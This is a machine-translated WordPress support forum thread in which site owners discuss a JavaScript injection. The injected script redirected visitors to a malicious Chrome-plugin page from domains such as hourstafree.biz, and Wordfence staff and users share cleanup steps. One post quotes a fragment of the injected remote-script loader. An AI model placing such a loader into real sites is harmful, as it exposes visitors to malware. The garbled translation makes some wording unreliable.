Un usuario preguntó 👇
Uno de los sitios que cuidamos se ha visto afectado por la inyección de código incorrecto en todo el sitio. Insertó un enlace javascript en un archivo alojado por hourstafree.biz
El archivo ha provocado que los visitantes del sitio sean redirigidos a una página que intenta instalar el plugin de Chrome. El script agrega una cookie llamada «crazytime» con un valor de 1 para que caduque 12 horas, de modo que los visitantes sean redirigidos solo en su primera visita, y luego si intentan volver a ingresar al dominio, funciona. multa.
Creemos que los piratas informáticos podrían usar la inyección SQL, porque el enlace al javascript se inserta en los cientos de lugares del sitio en la tabla de publicaciones y algunas veces en la tabla de opciones. La primera vez que visitamos el sitio no teníamos instalado Wordfence. Pero luego limpiamos la base de datos e instalamos Wordfence, incluida la configuración del firewall. Se supone que Wordfence detiene la inyección de SQL, pero en una semana el sitio fue pirateado nuevamente y se inyectaron más de 1300 entradas del mismo código de secuencia de comandos a través del sitio.
No sabemos dónde ingresaron, pero los sitios que los golpearon usan Contact Form 7, al igual que nuestros sitios que aman Gravity Forms.
Preguntas:
* ¿Wordfence analiza una base de datos en busca de códigos maliciosos? * Si es así, ¿hay algunas vecestafree.biz en la lista de códigos maliciosos de Wordfence para advertir? * ¿Puede Wordfence insertar código como a veces lo reconoce byree.biz en las publicaciones? ¿Y puede mostrar cómo los piratas informáticos intentaron ingresar el código si eso sucede?
(@wfyann)
Hace 3 años, 4 meses
Hola @ jodamo5,
¿Puede confirmar que el «Escanear publicaciones en busca de URL peligrosas conocidas y contenido sospechoso«¿Opción habilitada y la regla de firewall» Inyección SQL «?
«Las horas son baratas[DOT]biz ”debería estar en nuestra lista negra de dominios.
Se podría intentar identificar la hora exacta en que ocurren las inyecciones (verificando la última marca de tiempo modificada en archivos o capas de base de datos) y luego verificando el acceso a los registros para averiguar qué solicitudes hecho en ese momento. Esto puede darle una idea de cómo está sucediendo.
(@ whiteapple5)
Hace 3 años, 4 meses
Hola @ jodamo5,
¿Puede decirme qué código estoy buscando en la base de datos para eliminar la infección? Gracias
Porque un amigo tiene la misma inyección:
Sinceramente,
(@sussudio)
Hace 3 años, 4 meses
Tengo el mismo problema … ¿Cómo me recupero de este desagradable malware?
(@tarikjari)
Hace 3 años, 4 meses
También tengo el mismo problema
Wordfence no fue descubierto, y fue la misma pregunta que un amigo
Encontré código malicioso de JavaScript, en mi panel de temas no tuve tiempo de actualizarlo, eliminé el código ahora,
Estoy tratando de limpiar una base de datos ahora, tal vez otros archivos estén corruptos, donde sea que alguien pueda ayudar, soy todo oídos
mi facebook: tai.iek
gracias
(@ jodamo5)
Hace 3 años, 4 meses
Hola @wfyann, perdón por el retraso. Sí, puedo confirmar que ya hemos habilitado la opción «Analizar publicaciones en busca de URL peligrosas conocidas y contenido sospechoso».
@ whiteapple5 aquí están los pasos que usamos para limpiar nuestra base de datos: – En phpmyadmin, busque «hourstafree.biz» en toda la base de datos. Luego haga clic en uno de los resultados y observe la línea. Luego busque la etiqueta de secuencia de comandos exacta que existe, p. Ej. < o equivalente.
Seleccione ese texto exacto, luego instale WordPress Better Search and Replace Plugin, o su plugin favorito de búsqueda y reemplazo que le permite seleccionar todas las tablas en WP. (Algunos plugins de búsqueda y reemplazo no buscan en la tabla de opciones, por lo que necesita un plugin que busque tanto en la tabla de opciones como en la tabla de publicación).
Ejecute una búsqueda y reemplácela por otra para reemplazar la secuencia de comandos infractora (por lo tanto, deje el campo «reemplazar» en blanco).
Eso arreglará tu ubicación.
Nota: debe usar el plugin de búsqueda y reemplazo en lugar de hacerlo en phpmyadmin solo porque WordPress publica todos los datos en publicaciones seriadas. Entonces, al buscar y reemplazar un plugin, corregirá automáticamente los valores actualizados.
(@twitmediacritic)
Hace 3 años, 4 meses
¡Tengo 7 casos en wptm_options y 662 en wptm_posts!
GUAU.
También tenía el formulario de contacto 7 hasta ayer cuando comencé a solucionar este problema.
Esta respuesta fue modificada hace 3 años, 4 meses por.
(@tarikjari)
Hace 3 años, 4 meses
@ jodamo5
Ayuda ayuda
Hice lo que hiciste, limpié la base de datos, borré todas las entradas infectadas
Eliminé el tema y luego actualicé el tema.
por la mañana: el problema es visible, se siente por las estadísticas, no hay usuarios como de costumbre …
Eché un vistazo a mi panel de temas.
Sorprendente sorpresa: otro código malicioso
javascript personalizado:
var t = document.createElement («secuencia de comandos»); t.type = «texto / javascript»; t.src = «;; document.head.appendChild
esta vez no someime.biz sino con otra URL de dancewithme.biz
¿algunas ideas?
gracias
(@wfyann)
Hace 3 años, 4 meses
Hola,
Después de discutir este tema con mis colegas, las «horas parecen baratas[dot]Los sitios que tenían instalado el script «searchreplacedb2.php» (ya sea por su proveedor de alojamiento o por usted) eran en su mayoría biz «, una herramienta que generalmente se usa para mover un sitio, pero que no se elimina después después de la migración o protegido con .htaccess, cualquiera que lo use puede usarlo.
Entonces, lo primero que debe hacer es verificar si tiene ese script y, en ese caso, eliminarlo.
Incluso si nunca tuvo ese script, la inyección SQL probablemente no se usó para actualizar cada trabajo. Las publicaciones podrían actualizarse de cualquier manera para acceder a la base de datos, como si un atacante encontrara una copia de seguridad de wp-config.php que es públicamente visible (con un nombre como wp-config.bak mostrado por el servidor web como texto sin formato), una copia de seguridad del sitio en una carpeta pública o si el usuario de la base de datos tiene una contraseña incorrecta. O incluso podría ser un fondo típico que permite a los piratas informáticos ejecutar PHP.
En todos los casos, le recomendamos que siga nuestra guía de limpieza del sitio. aquí.
Y le recomendamos encarecidamente que cambie todas las contraseñas (especialmente la contraseña de la base de datos).
(@ jodamo5)
Hace 3 años, 4 meses
Gracias @wfyann, es una gran información para saber.
(@gideonbergmans)
Hace 3 años, 4 meses
Genial, jodamo5. Esta solución solucionó el sitio web por sí solo, gracias 🙂
(@cipes)
Hace 2 años, 11 meses
Gracias @ jodamo5, tengo un sitio sobre la inyección de JS dancewithme.biz travieso en todo el mundo y Wordfence tampoco lo recogió.
Has resuelto el truco. ¡Gracias!
¿Solucionó tu problema??
0 / 0